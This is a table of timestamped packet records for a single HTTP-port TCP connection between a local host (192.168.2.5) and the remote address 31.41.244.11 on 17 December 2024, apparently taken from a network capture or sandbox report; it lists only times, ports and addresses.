Dec 17, 2024 06:03:42.952182055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.952224016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.953166962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.953212023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.953224897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.953268051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.954286098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.954301119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.954344988 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.955235958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.955279112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.955354929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.955399036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.956340075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.956382036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.956394911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.956435919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.957351923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.957395077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.957657099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.957700014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.958444118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.958539963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.958584070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.959479094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.959522963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.959546089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.959585905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.960558891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.960602045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.960623980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.960664034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.961688995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.961730957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.961771965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.961813927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.962824106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.962840080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.962867022 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.962878942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.963768005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.963812113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.963845015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.963887930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.964848042 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.964890957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.964914083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.964956045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.965858936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.965951920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.965997934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.967029095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.967044115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.967088938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.967961073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.968007088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.968095064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.968136072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.968974113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.969017982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.105525970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.105607986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.105762959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.105968952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.106019974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.106060028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.106108904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.106794119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.106839895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.106906891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.106951952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.108361006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.108412027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.108437061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.108479977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.108999968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.109049082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.109061003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.109107018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.110071898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.110117912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.110135078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.110177994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.111073017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.111118078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.111260891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.111304998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.112097979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.112148046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.112265110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.112309933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.113240004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.113255978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.113286018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.113301992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.114250898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.114295959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.114310026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.114351034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.115262985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.115309000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.115444899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.115499973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.116419077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.116511106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.116527081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.116570950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.117429018 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.117474079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.117588997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.117635012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.118516922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.118561029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.118586063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.118628979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.119581938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.119597912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.119627953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.119643927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.120563984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.120609999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.120685101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.120728016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.121700048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.121746063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.121786118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.121866941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.122730970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.122776031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.122808933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.122852087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.123800993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.123846054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.123856068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.123898983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.124845028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.124891043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.125025034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.125070095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.126004934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.126053095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.126054049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.126100063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.126971006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.127037048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.127181053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.127223969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.128074884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.128119946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.128151894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.128196955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.129098892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.129143953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.129301071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.129347086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.130166054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.130208969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.130295038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.130340099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.131217003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.131263018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.131299973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.131345034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.132292032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.132337093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.132461071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.132503986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.133414984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.133430958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.133460045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.133477926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.134475946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.134490967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.134519100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.134531021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.135562897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.135607958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.135627031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.135668039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.136595964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.136610985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.136642933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.136653900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.137543917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.137608051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.137722969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.137767076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.138581991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.138622999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.138844013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.138887882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.139763117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.139806986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.139839888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.139883041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.140762091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.140805006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.140942097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.140985966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.141936064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.141983032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.142021894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.142066002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.142816067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.142859936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.143008947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.143054962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.143902063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.143948078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.144016981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.144067049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.144982100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.145026922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.145065069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.145108938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.146066904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.146111965 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.146114111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.146158934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.147180080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.147196054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.147224903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.147243023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.148113966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.148181915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.148300886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.148344994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.149239063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.149282932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.149349928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.149390936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.150262117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.150309086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.150368929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.150413990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.151334047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.151380062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.151463032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.151506901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.152472019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.152487993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.152518034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.152529955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.153539896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.153559923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.153605938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.154514074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.154561043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.154637098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.154680014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.155621052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.155668020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.155740023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.155781984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.156620026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.156666994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.156800985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.156846046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.157804012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.157819033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.157849073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.157859087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.158853054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.158869028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.158895969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.158906937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.159862995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.159907103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.159976006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.160018921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.160860062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.160911083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.297997952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.298017979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.298199892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.298508883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.298523903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.298569918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.299482107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.299520969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.299818039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.299855947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.300461054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.300498962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.301012039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.301034927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.301048040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.301064968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.302057981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.302073002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.302094936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.302109957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.304622889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.304662943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.305438042 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.305475950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.306102037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.306117058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.306138039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.306154013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.306252003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.306267023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.306288958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.306305885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.306905031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.306942940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.307101965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.307137966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.307950020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.307966948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.307988882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.308003902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.309139013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.309154987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.309180975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.309195995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.310195923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.310210943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.310233116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.310247898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.311012983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.311049938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.311147928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.311184883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.312191963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.312230110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.312370062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.312405109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.313226938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.313263893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.313395977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.313431025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.314264059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.314301968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.314449072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.314483881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.315438986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.315463066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.315476894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.315494061 CET	49902	80	192.168.2.5	31.41.244.11
